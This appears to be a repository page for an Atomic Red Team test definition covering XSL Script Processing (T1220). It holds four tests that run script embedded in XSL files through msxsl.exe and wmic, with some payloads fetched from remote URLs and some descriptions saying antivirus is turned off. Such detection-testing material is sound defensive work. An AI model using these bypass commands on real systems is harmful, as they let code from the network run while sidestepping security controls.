security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1220/T1220.yaml
T
Carrie Roberts d4709021fb Handle spaces in file paths (#2535) 
* updating atomics count in README.md [ci skip]

* wip

* handle spaces in path

* update readme

* fix typo

---------

Co-authored-by: publish bot <opensource@redcanary.com>
2023-09-22 10:47:25 -06:00

138 lines
6.2 KiB
YAML
Raw Permalink Blame History

attack_technique: T1220
display_name: XSL Script Processing
atomic_tests:
- name: MSXSL Bypass using local files
auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d
description: |
Executes the code specified within a XSL script tag during XSL transformation using a local payload.
Requires download of MSXSL. No longer available from Microsoft.
(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
Open Calculator.exe when test successfully executed, while AV turned off.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Location of the test XML file on the local filesystem.
type: path
default: PathToAtomicsFolder\T1220\src\msxslxmlfile.xml
xslfile:
description: Location of the test XSL script file on the local filesystem.
type: path
default: PathToAtomicsFolder\T1220\src\msxslscript.xsl
msxsl_exe:
description: Location of the MSXSL executable.
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
dependency_executor_name: powershell
dependencies:
- description: |
XML file must exist on disk at specified location (#{xmlfile})
prereq_command: |
if (Test-Path "#{xmlfile}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{xmlfile}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
- description: |
XSL file must exist on disk at specified location (#{xslfile})
prereq_command: |
if (Test-Path "#{xslfile}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{xslfile}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
- description: |
msxsl.exe must exist on disk at specified location (#{msxsl_exe})
prereq_command: |
if (Test-Path "#{msxsl_exe}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
executor:
command: |
"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
cleanup_command: |
del "#{msxsl_exe}" >nul 2>&1
name: command_prompt
- name: MSXSL Bypass using remote files
auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload.
Requires download of MSXSL.exe. No longer available from Microsoft.
(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
Open Calculator.exe when test successfully executed, while AV turned off.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Remote location (URL) of the test XML file.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
msxsl_exe:
description: Location of the MSXSL executable.
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
dependency_executor_name: powershell
dependencies:
- description: |
msxsl.exe must exist on disk at specified location ("#{msxsl_exe}")
prereq_command: |
if (Test-Path "#{msxsl_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
executor:
command: |
"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
cleanup_command: |
del -Path #{msxsl_exe} >nul 2>&1
name: command_prompt
- name: WMIC bypass using local XSL file
auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
description: |
Executes the code specified within a XSL script using a local payload.
supported_platforms:
- windows
input_arguments:
wmic_command:
description: WMI command to execute using wmic.exe
type: string
default: process list
local_xsl_file:
description: Location of the test XSL script file on the local filesystem.
type: path
default: PathToAtomicsFolder\T1220\src\wmicscript.xsl
dependency_executor_name: powershell
dependencies:
- description: |
XSL file must exist on disk at specified location (#{local_xsl_file})
prereq_command: |
if (Test-Path "#{local_xsl_file}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{local_xsl_file}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
executor:
command: |
wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
name: command_prompt
- name: WMIC bypass using remote XSL file
auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
description: |
Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off.
supported_platforms:
- windows
input_arguments:
remote_xsl_file:
description: Remote location of an XSL payload.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
wmic_command:
description: WMI command to execute using wmic.exe
type: string
default: process list
executor:
command: |
wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
name: command_prompt
Reference in New Issue View Git Blame Copy Permalink